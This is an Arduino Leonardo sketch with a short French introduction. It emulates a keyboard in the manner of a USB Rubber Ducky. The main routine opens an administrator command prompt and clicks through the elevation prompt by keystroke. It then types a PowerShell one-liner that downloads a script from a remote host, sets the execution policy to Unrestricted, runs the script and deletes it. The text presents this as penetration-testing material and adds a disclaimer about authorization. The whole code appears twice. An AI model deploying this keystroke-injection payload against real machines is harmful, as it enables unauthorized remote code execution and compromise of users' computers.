Le code ci-dessous est utilisable sur un Arduino Leonardo ou sur n’importe quel autre périphérique équipé de la puce « MEGA32U4 ». Le script télécharge un script PowerShell depuis une URL distante, l’enregistre sur le bureau, puis l’exécute avant de quitter le shell.
Dans le cadre d’un test d’intrusion, un USB Rubber Ducky ne doit être utilisé que sur des matériels dont vous êtes propriétaire ou pour lesquels vous disposez d’une autorisation.
#include "KeyboardAzertyFr.h"
/**
 * Starts the AZERTY HID keyboard, then pauses with rdLongerDelay()
 * before any key is sent.
 */
void start()
{
  KeyboardAzertyFr.begin();
  rdLongerDelay();
}
/**
 * Ends the keyboard emulation by calling KeyboardAzertyFr.end().
 */
void finish()
{
  KeyboardAzertyFr.end();
}
/**
 * Short fixed pause (100 ms) inserted between keystrokes.
 */
void rdDelay()
{
  const unsigned long pauseMs = 100;
  delay(pauseMs);
}
/**
 * Longer pause: five consecutive rdDelay() calls.
 */
void rdLongerDelay()
{
  int remaining = 5;
  while (remaining-- > 0) {
    rdDelay();
  }
}
/**
 * Types the given text through the emulated keyboard, then waits one
 * rdDelay().
 */
void rdWriteText(String text)
{
  KeyboardAzertyFr.print(text);
  rdDelay();
}
/**
 * Presses and releases a single key, waiting one rdDelay() after each
 * of the two actions.
 */
void rdTypeKey(uint8_t key) {
  KeyboardAzertyFr.press(key);
  rdDelay();

  KeyboardAzertyFr.release(key);
  rdDelay();
}
/***********************
* Libraries *
***********************
* You may remove the *
* unused functions *
* before uploading *
* the code to the *
* arduino *
***********************/
/**
 * Sends GUI + 'r', types `program`, waits one rdDelay() and presses
 * Return.
 * Example: "notepad" starts notepad, "calc" starts the calculator.
 */
void rdRun(String program)
{
  rdGuiCombination('r');

  KeyboardAzertyFr.print(program);
  rdDelay();

  rdTypeKey(KEY_RETURN);
}
/**
 * Takes a screenshot.
 *
 * Key codes 206 and 229 are both sent because, per the original author,
 * some machines treat one or the other (or both) as PrtScreen. The
 * letters "h" and "b" are then typed, each followed by one rdDelay().
 */
void rdPrintScreen()
{
  const uint8_t printScreenKeys[] = {206, 229};
  for (uint8_t keyCode : printScreenKeys) {
    rdTypeKey(keyCode);
  }

  KeyboardAzertyFr.print(F("h"));
  rdDelay();

  KeyboardAzertyFr.print(F("b"));
  rdDelay();
}
/**
 * Sends Ctrl + Shift + 'i', the shortcut the original author uses to
 * open the JavaScript console of a browser.
 */
void rdOpenJavascriptConsole()
{
  rdKeyCombination(KEY_LEFT_CTRL, KEY_LEFT_SHIFT, 'i');
}
/**
 * Hides a window by moving it as far down as it will go.
 *
 * Sends Alt + Space, types "M", then holds the Down arrow for ten
 * rdLongerDelay() periods (50 rdDelay() calls in total) before
 * releasing it. The final Return ends the move and puts the cursor back
 * where it was.
 */
void rdHideWindow()
{
  rdAltCombination(' ');
  KeyboardAzertyFr.print(F("M"));
  rdDelay();

  KeyboardAzertyFr.press(KEY_DOWN_ARROW);
  // The key stays down for the whole wait; the host's key repeat moves
  // the window, so the number of strokes actually taken is not exact.
  int periods = 10;
  while (periods-- > 0) {
    rdLongerDelay();
  }
  KeyboardAzertyFr.release(KEY_DOWN_ARROW);

  // Return repositions the cursor back to its original position.
  rdTypeKey(KEY_RETURN);
}
/**
 * Sends GUI (Windows key) + 'd'.
 */
void rdShowDesktop()
{
  rdGuiCombination('d');
}
/**
 * Sends Ctrl + 'v' (paste).
 */
void rdPaste()
{
  rdCtrlCombination('v');
}
/**
 * Sends Ctrl + 'x' (cut).
 */
void rdCut()
{
  rdCtrlCombination('x');
}
/**
 * Sends Ctrl + 'c' (copy).
 */
void rdCopy()
{
  rdCtrlCombination('c');
}
/**
 * Sends left GUI + the received key.
 */
void rdGuiCombination(uint8_t c)
{
  rdKeyCombination(KEY_LEFT_GUI, c);
}
/**
 * Sends left Alt + the received key.
 */
void rdAltCombination(uint8_t c)
{
  rdKeyCombination(KEY_LEFT_ALT, c);
}
/**
 * Sends left Ctrl + the received key.
 */
void rdCtrlCombination(uint8_t c)
{
  rdKeyCombination(KEY_LEFT_CTRL, c);
}
/**
 * Sends left Shift + the received key.
 */
void rdShiftCombination(uint8_t c)
{
  rdKeyCombination(KEY_LEFT_SHIFT, c);
}
/**
 * Two-key chord: presses `holdKey`, then `targetKey`, then releases
 * every pressed key. One rdDelay() follows each step.
 */
void rdKeyCombination(uint8_t holdKey, uint8_t targetKey)
{
  KeyboardAzertyFr.press(holdKey);
  rdDelay();

  KeyboardAzertyFr.press(targetKey);
  rdDelay();

  // releaseAll() also lets go of keys pressed by the wider overloads.
  KeyboardAzertyFr.releaseAll();
  rdDelay();
}
/**
 * Three-key chord: presses `holdKey1`, waits one rdDelay(), then hands
 * `holdKey2` + `targetKey` to the two-key overload, which releases all
 * keys at the end.
 */
void rdKeyCombination(uint8_t holdKey1, uint8_t holdKey2, uint8_t targetKey)
{
  KeyboardAzertyFr.press(holdKey1);
  rdDelay();

  rdKeyCombination(holdKey2, targetKey);
}
/**
 * Four-key chord: presses `holdKey1`, waits one rdDelay(), then hands
 * the remaining three keys to the three-key overload.
 */
void rdKeyCombination(uint8_t holdKey1, uint8_t holdKey2, uint8_t holdKey3, uint8_t targetKey)
{
  KeyboardAzertyFr.press(holdKey1);
  rdDelay();

  rdKeyCombination(holdKey2, holdKey3, targetKey);
}
/**
 * Opens the command prompt without admin rights; shorthand for
 * rdOpenCommandPrompt(false).
 */
void rdOpenCommandPrompt()
{
  const boolean withAdminRights = false;
  rdOpenCommandPrompt(withAdminRights);
}
/**
 * Opens a command prompt.
 *
 * When `admin` is false, "cmd" is started through rdRun(). When it is
 * true, GUI + 'x' is sent, "a" is typed, and after 100 ms the elevation
 * prompt is answered by rdAcceptWindowsSmartScreen().
 *
 * NOTE(review): the elevated path depends on the prompt being accepted
 * by keystrokes alone; presumably it does nothing useful where elevation
 * asks for credentials - confirm on the tested configuration.
 */
void rdOpenCommandPrompt(boolean admin)
{
  if (!admin) {
    rdRun("cmd");
    return;
  }

  rdGuiCombination('x');
  KeyboardAzertyFr.print(F("a"));
  delay(100);
  rdAcceptWindowsSmartScreen();
}
/**
 * Answers the prompt shown when admin permissions are requested: waits
 * one rdLongerDelay(), presses Left arrow, then types a space.
 *
 * NOTE(review): the name says SmartScreen, but the dialog that appears
 * on elevation is presumably the UAC consent prompt - confirm.
 */
void rdAcceptWindowsSmartScreen()
{
  // Fixed wait until the prompt shows up; nothing checks that it did.
  rdLongerDelay();

  rdTypeKey(KEY_LEFT_ARROW);
  rdDelay();

  KeyboardAzertyFr.print(F(" "));
  rdDelay();
}
/**
 * Sends left Alt + left Shift to switch the keyboard layout. If the
 * computer has only one layout, the combination does nothing.
 */
void rdChangeKeyboardLayout()
{
  rdAltCombination(KEY_LEFT_SHIFT);
}
/**
 * Builds one "powershell ..." command line from one or more scripts
 * separated by '\n' and passes it to rdRun().
 *
 * Every segment that ends at a newline is wrapped as "(segment) ; ".
 * Whatever remains after the last split is appended as-is, without
 * parentheses. Splitting only continues while the newline is found at
 * an index greater than 0.
 */
void rdPowershellRun(String scripts)
{
  const char delimiter = '\n';
  String finalScript = "powershell ";

  for (int cut = scripts.indexOf(delimiter); cut > 0; cut = scripts.indexOf(delimiter)) {
    finalScript = finalScript + "(" + scripts.substring(0, cut) + ") ; ";
    scripts = scripts.substring(cut + 1);
  }

  // The trailing segment is deliberately not wrapped in parentheses.
  finalScript = finalScript + scripts;
  rdRun(finalScript);
}
/**
 * Presses a key, holds it for 500 ms, then releases it. Unlike
 * rdTypeKey() there is no pause after the release.
 */
void typeKey(int key) {
  const unsigned long holdMs = 500;

  KeyboardAzertyFr.press(key);
  delay(holdMs);
  KeyboardAzertyFr.release(key);
}
/*********************
* Arduino *
*********************/
// ---------------------------------------------------
// ' ' est le symbole qui désigne un espace, il a la valeur 44
// Alt Gr azerty € ~ # { [ | ` \ ^ @ ' ' ] } ¤
// Shift azerty Q B C D E F G H I J K L ? N O P A R S T U V Z X Y Z 1 2 3 4 5 6 7 8 9 0 ' ' ° + ¨ £ µ No fr M % NONE . / § >
// azerty q b c d e f g h i j k l , n o p a r s t u v z x y z & é " ' ( - è _ ç à ' ' ) = ^ $ * No fr m ù ² ; : ! <
// qwerty a b c d e f g h i j k l m n o p q r s t u v w x y z 1 2 3 4 5 6 7 8 9 0 ' ' - = [ ] \ No US ; ' ` , . / No US
// scancode 4, 5, 6, 7, 8, 9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39, 44, 45,46,47,48,49, 50, 51,52, 53, 54,55,56, 100};
/**
 * Arduino entry point: types the whole keystroke sequence once.
 *
 * Steps visible below: start the HID keyboard, request an administrator
 * shell with rdOpenCommandPrompt(true), type a single PowerShell line
 * that downloads GetRessources.ps1 to the user's Desktop, runs it,
 * deletes it and exits, then press Return and stop the keyboard.
 *
 * NOTE(review), points to weigh when this is run or assessed:
 *  - The account name and password are hard-coded in the sketch and are
 *    typed in clear text into the shell.
 *  - The download URL is http://, so the script travels unprotected (and
 *    possibly the credentials too, depending on the auth scheme); the
 *    script is executed without any integrity check.
 *  - Set-ExecutionPolicy Unrestricted is never reverted, so the host
 *    keeps the weakened policy after the run.
 *  - The file is removed after execution; traces are therefore to be
 *    looked for in PowerShell / process-creation logging rather than on
 *    disk.
 *  - All waits are fixed delays; nothing verifies that the shell or the
 *    elevation prompt actually appeared before typing continues.
 */
void setup() {
start();
// Open an administrator shell
rdOpenCommandPrompt(true);
delay(500);
// Start typing the command that downloads the remote script
KeyboardAzertyFr.print("$output = $env:USERPROFILE");
// Shift + '=' types '+' (PowerShell string concatenation)
KeyboardAzertyFr.press(KEY_LEFT_SHIFT);
KeyboardAzertyFr.print("=");// types '+' for the concatenation
KeyboardAzertyFr.release(KEY_LEFT_SHIFT);
KeyboardAzertyFr.print("'");
// Compose the '\' character of the PowerShell path
// Alt Gr = Ctrl + Alt
KeyboardAzertyFr.press(KEY_LEFT_CTRL);
KeyboardAzertyFr.press(KEY_LEFT_ALT);
keyboardScanCode(37); // or keyboard.print('\');
KeyboardAzertyFr.release(KEY_LEFT_ALT);
KeyboardAzertyFr.release(KEY_LEFT_CTRL);
KeyboardAzertyFr.print("Desktop");
// Second '\' of the path, composed the same way
KeyboardAzertyFr.press(KEY_LEFT_CTRL);
KeyboardAzertyFr.press(KEY_LEFT_ALT);
keyboardScanCode(37); // or keyboard.print('\');
KeyboardAzertyFr.release(KEY_LEFT_ALT);
KeyboardAzertyFr.release(KEY_LEFT_CTRL);
KeyboardAzertyFr.print("GetRessources.ps1';");
// Rest of the one-liner: build a credential, download, change the
// execution policy, run the script, delete it, leave the shell.
KeyboardAzertyFr.print("$securepassword = ConvertTo-SecureString 'user00290987' -AsPlainText -Force;$credentials = New-Object System.Management.Automation.PSCredential('user002', $securepassword);Invoke-WebRequest -Uri http://monip/ressources/GetRessources.ps1 -OutFile $output -Credential $credentials;Set-ExecutionPolicy Unrestricted -force; & $output;Remove-Item -path $output;exit;");
delay(500);
// Return submits the typed line
rdTypeKey(KEY_RETURN);
finish();
}
// Intentionally empty: every keystroke is sent once from setup().
void loop()
{
}
/**
 * Presses and releases the key value `code + 136`, holding it for 5 ms.
 *
 * NOTE(review): presumably KeyboardAzertyFr follows the stock Arduino
 * Keyboard convention in which values of 136 and above are sent as raw
 * scancodes (value - 136) - confirm against the library.
 */
void keyboardScanCode(byte code)
{
  const int rawKey = code + 136;

  KeyboardAzertyFr.press(rawKey);
  delay(5);
  KeyboardAzertyFr.release(rawKey);
}
/**
 * Starts the AZERTY HID keyboard, then pauses with rdLongerDelay()
 * before any key is sent.
 */
void start()
{
  KeyboardAzertyFr.begin();
  rdLongerDelay();
}
/**
 * Ends the keyboard emulation by calling KeyboardAzertyFr.end().
 */
void finish()
{
  KeyboardAzertyFr.end();
}
/**
 * Short fixed pause (100 ms) inserted between keystrokes.
 */
void rdDelay()
{
  const unsigned long pauseMs = 100;
  delay(pauseMs);
}
/**
 * Longer pause: five consecutive rdDelay() calls.
 */
void rdLongerDelay()
{
  int remaining = 5;
  while (remaining-- > 0) {
    rdDelay();
  }
}
/**
 * Types the given text through the emulated keyboard, then waits one
 * rdDelay().
 */
void rdWriteText(String text)
{
  KeyboardAzertyFr.print(text);
  rdDelay();
}
/**
 * Presses and releases a single key, waiting one rdDelay() after each
 * of the two actions.
 */
void rdTypeKey(uint8_t key) {
  KeyboardAzertyFr.press(key);
  rdDelay();

  KeyboardAzertyFr.release(key);
  rdDelay();
}
/***********************
* Libraries *
***********************
* You may remove the *
* unused functions *
* before uploading *
* the code to the *
* arduino *
***********************/
/**
 * Sends GUI + 'r', types `program`, waits one rdDelay() and presses
 * Return.
 * Example: "notepad" starts notepad, "calc" starts the calculator.
 */
void rdRun(String program)
{
  rdGuiCombination('r');

  KeyboardAzertyFr.print(program);
  rdDelay();

  rdTypeKey(KEY_RETURN);
}
/**
 * Takes a screenshot.
 *
 * Key codes 206 and 229 are both sent because, per the original author,
 * some machines treat one or the other (or both) as PrtScreen. The
 * letters "h" and "b" are then typed, each followed by one rdDelay().
 */
void rdPrintScreen()
{
  const uint8_t printScreenKeys[] = {206, 229};
  for (uint8_t keyCode : printScreenKeys) {
    rdTypeKey(keyCode);
  }

  KeyboardAzertyFr.print(F("h"));
  rdDelay();

  KeyboardAzertyFr.print(F("b"));
  rdDelay();
}
/**
 * Sends Ctrl + Shift + 'i', the shortcut the original author uses to
 * open the JavaScript console of a browser.
 */
void rdOpenJavascriptConsole()
{
  rdKeyCombination(KEY_LEFT_CTRL, KEY_LEFT_SHIFT, 'i');
}
/**
 * Hides a window by moving it as far down as it will go.
 *
 * Sends Alt + Space, types "M", then holds the Down arrow for ten
 * rdLongerDelay() periods (50 rdDelay() calls in total) before
 * releasing it. The final Return ends the move and puts the cursor back
 * where it was.
 */
void rdHideWindow()
{
  rdAltCombination(' ');
  KeyboardAzertyFr.print(F("M"));
  rdDelay();

  KeyboardAzertyFr.press(KEY_DOWN_ARROW);
  // The key stays down for the whole wait; the host's key repeat moves
  // the window, so the number of strokes actually taken is not exact.
  int periods = 10;
  while (periods-- > 0) {
    rdLongerDelay();
  }
  KeyboardAzertyFr.release(KEY_DOWN_ARROW);

  // Return repositions the cursor back to its original position.
  rdTypeKey(KEY_RETURN);
}
/**
 * Sends GUI (Windows key) + 'd'.
 */
void rdShowDesktop()
{
  rdGuiCombination('d');
}
/**
 * Sends Ctrl + 'v' (paste).
 */
void rdPaste()
{
  rdCtrlCombination('v');
}
/**
 * Sends Ctrl + 'x' (cut).
 */
void rdCut()
{
  rdCtrlCombination('x');
}
/**
 * Sends Ctrl + 'c' (copy).
 */
void rdCopy()
{
  rdCtrlCombination('c');
}
/**
 * Sends left GUI + the received key.
 */
void rdGuiCombination(uint8_t c)
{
  rdKeyCombination(KEY_LEFT_GUI, c);
}
/**
 * Sends left Alt + the received key.
 */
void rdAltCombination(uint8_t c)
{
  rdKeyCombination(KEY_LEFT_ALT, c);
}
/**
 * Sends left Ctrl + the received key.
 */
void rdCtrlCombination(uint8_t c)
{
  rdKeyCombination(KEY_LEFT_CTRL, c);
}
/**
 * Sends left Shift + the received key.
 */
void rdShiftCombination(uint8_t c)
{
  rdKeyCombination(KEY_LEFT_SHIFT, c);
}
/**
 * Two-key chord: presses `holdKey`, then `targetKey`, then releases
 * every pressed key. One rdDelay() follows each step.
 */
void rdKeyCombination(uint8_t holdKey, uint8_t targetKey)
{
  KeyboardAzertyFr.press(holdKey);
  rdDelay();

  KeyboardAzertyFr.press(targetKey);
  rdDelay();

  // releaseAll() also lets go of keys pressed by the wider overloads.
  KeyboardAzertyFr.releaseAll();
  rdDelay();
}
/**
 * Three-key chord: presses `holdKey1`, waits one rdDelay(), then hands
 * `holdKey2` + `targetKey` to the two-key overload, which releases all
 * keys at the end.
 */
void rdKeyCombination(uint8_t holdKey1, uint8_t holdKey2, uint8_t targetKey)
{
  KeyboardAzertyFr.press(holdKey1);
  rdDelay();

  rdKeyCombination(holdKey2, targetKey);
}
/**
 * Four-key chord: presses `holdKey1`, waits one rdDelay(), then hands
 * the remaining three keys to the three-key overload.
 */
void rdKeyCombination(uint8_t holdKey1, uint8_t holdKey2, uint8_t holdKey3, uint8_t targetKey)
{
  KeyboardAzertyFr.press(holdKey1);
  rdDelay();

  rdKeyCombination(holdKey2, holdKey3, targetKey);
}
/**
 * Opens the command prompt without admin rights; shorthand for
 * rdOpenCommandPrompt(false).
 */
void rdOpenCommandPrompt()
{
  const boolean withAdminRights = false;
  rdOpenCommandPrompt(withAdminRights);
}
/**
 * Opens a command prompt.
 *
 * When `admin` is false, "cmd" is started through rdRun(). When it is
 * true, GUI + 'x' is sent, "a" is typed, and after 100 ms the elevation
 * prompt is answered by rdAcceptWindowsSmartScreen().
 *
 * NOTE(review): the elevated path depends on the prompt being accepted
 * by keystrokes alone; presumably it does nothing useful where elevation
 * asks for credentials - confirm on the tested configuration.
 */
void rdOpenCommandPrompt(boolean admin)
{
  if (!admin) {
    rdRun("cmd");
    return;
  }

  rdGuiCombination('x');
  KeyboardAzertyFr.print(F("a"));
  delay(100);
  rdAcceptWindowsSmartScreen();
}
/**
 * Answers the prompt shown when admin permissions are requested: waits
 * one rdLongerDelay(), presses Left arrow, then types a space.
 *
 * NOTE(review): the name says SmartScreen, but the dialog that appears
 * on elevation is presumably the UAC consent prompt - confirm.
 */
void rdAcceptWindowsSmartScreen()
{
  // Fixed wait until the prompt shows up; nothing checks that it did.
  rdLongerDelay();

  rdTypeKey(KEY_LEFT_ARROW);
  rdDelay();

  KeyboardAzertyFr.print(F(" "));
  rdDelay();
}
/**
 * Sends left Alt + left Shift to switch the keyboard layout. If the
 * computer has only one layout, the combination does nothing.
 */
void rdChangeKeyboardLayout()
{
  rdAltCombination(KEY_LEFT_SHIFT);
}
/**
 * Builds one "powershell ..." command line from one or more scripts
 * separated by '\n' and passes it to rdRun().
 *
 * Every segment that ends at a newline is wrapped as "(segment) ; ".
 * Whatever remains after the last split is appended as-is, without
 * parentheses. Splitting only continues while the newline is found at
 * an index greater than 0.
 */
void rdPowershellRun(String scripts)
{
  const char delimiter = '\n';
  String finalScript = "powershell ";

  for (int cut = scripts.indexOf(delimiter); cut > 0; cut = scripts.indexOf(delimiter)) {
    finalScript = finalScript + "(" + scripts.substring(0, cut) + ") ; ";
    scripts = scripts.substring(cut + 1);
  }

  // The trailing segment is deliberately not wrapped in parentheses.
  finalScript = finalScript + scripts;
  rdRun(finalScript);
}
/**
 * Presses a key, holds it for 500 ms, then releases it. Unlike
 * rdTypeKey() there is no pause after the release.
 */
void typeKey(int key) {
  const unsigned long holdMs = 500;

  KeyboardAzertyFr.press(key);
  delay(holdMs);
  KeyboardAzertyFr.release(key);
}
/*********************
* Arduino *
*********************/
// ---------------------------------------------------
// ' ' est le symbole qui désigne un espace, il a la valeur 44
// Alt Gr azerty € ~ # { [ | ` \ ^ @ ' ' ] } ¤
// Shift azerty Q B C D E F G H I J K L ? N O P A R S T U V Z X Y Z 1 2 3 4 5 6 7 8 9 0 ' ' ° + ¨ £ µ No fr M % NONE . / § >
// azerty q b c d e f g h i j k l , n o p a r s t u v z x y z & é " ' ( - è _ ç à ' ' ) = ^ $ * No fr m ù ² ; : ! <
// qwerty a b c d e f g h i j k l m n o p q r s t u v w x y z 1 2 3 4 5 6 7 8 9 0 ' ' - = [ ] \ No US ; ' ` , . / No US
// scancode 4, 5, 6, 7, 8, 9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39, 44, 45,46,47,48,49, 50, 51,52, 53, 54,55,56, 100};
/**
 * Arduino entry point: types the whole keystroke sequence once.
 *
 * Steps visible below: start the HID keyboard, request an administrator
 * shell with rdOpenCommandPrompt(true), type a single PowerShell line
 * that downloads GetRessources.ps1 to the user's Desktop, runs it,
 * deletes it and exits, then press Return and stop the keyboard.
 *
 * NOTE(review), points to weigh when this is run or assessed:
 *  - The account name and password are hard-coded in the sketch and are
 *    typed in clear text into the shell.
 *  - The download URL is http://, so the script travels unprotected (and
 *    possibly the credentials too, depending on the auth scheme); the
 *    script is executed without any integrity check.
 *  - Set-ExecutionPolicy Unrestricted is never reverted, so the host
 *    keeps the weakened policy after the run.
 *  - The file is removed after execution; traces are therefore to be
 *    looked for in PowerShell / process-creation logging rather than on
 *    disk.
 *  - All waits are fixed delays; nothing verifies that the shell or the
 *    elevation prompt actually appeared before typing continues.
 */
void setup() {
start();
// Open an administrator shell
rdOpenCommandPrompt(true);
delay(500);
// Start typing the command that downloads the remote script
KeyboardAzertyFr.print("$output = $env:USERPROFILE");
// Shift + '=' types '+' (PowerShell string concatenation)
KeyboardAzertyFr.press(KEY_LEFT_SHIFT);
KeyboardAzertyFr.print("=");// types '+' for the concatenation
KeyboardAzertyFr.release(KEY_LEFT_SHIFT);
KeyboardAzertyFr.print("'");
// Compose the '\' character of the PowerShell path
// Alt Gr = Ctrl + Alt
KeyboardAzertyFr.press(KEY_LEFT_CTRL);
KeyboardAzertyFr.press(KEY_LEFT_ALT);
keyboardScanCode(37); // or keyboard.print('\');
KeyboardAzertyFr.release(KEY_LEFT_ALT);
KeyboardAzertyFr.release(KEY_LEFT_CTRL);
KeyboardAzertyFr.print("Desktop");
// Second '\' of the path, composed the same way
KeyboardAzertyFr.press(KEY_LEFT_CTRL);
KeyboardAzertyFr.press(KEY_LEFT_ALT);
keyboardScanCode(37); // or keyboard.print('\');
KeyboardAzertyFr.release(KEY_LEFT_ALT);
KeyboardAzertyFr.release(KEY_LEFT_CTRL);
KeyboardAzertyFr.print("GetRessources.ps1';");
// Rest of the one-liner: build a credential, download, change the
// execution policy, run the script, delete it, leave the shell.
KeyboardAzertyFr.print("$securepassword = ConvertTo-SecureString 'user00290987' -AsPlainText -Force;$credentials = New-Object System.Management.Automation.PSCredential('user002', $securepassword);Invoke-WebRequest -Uri http://monip/ressources/GetRessources.ps1 -OutFile $output -Credential $credentials;Set-ExecutionPolicy Unrestricted -force; & $output;Remove-Item -path $output;exit;");
delay(500);
// Return submits the typed line
rdTypeKey(KEY_RETURN);
finish();
}
// Intentionally empty: every keystroke is sent once from setup().
void loop()
{
}
/**
 * Presses and releases the key value `code + 136`, holding it for 5 ms.
 *
 * NOTE(review): presumably KeyboardAzertyFr follows the stock Arduino
 * Keyboard convention in which values of 136 and above are sent as raw
 * scancodes (value - 136) - confirm against the library.
 */
void keyboardScanCode(byte code)
{
  const int rawKey = code + 136;

  KeyboardAzertyFr.press(rawKey);
  delay(5);
  KeyboardAzertyFr.release(rawKey);
}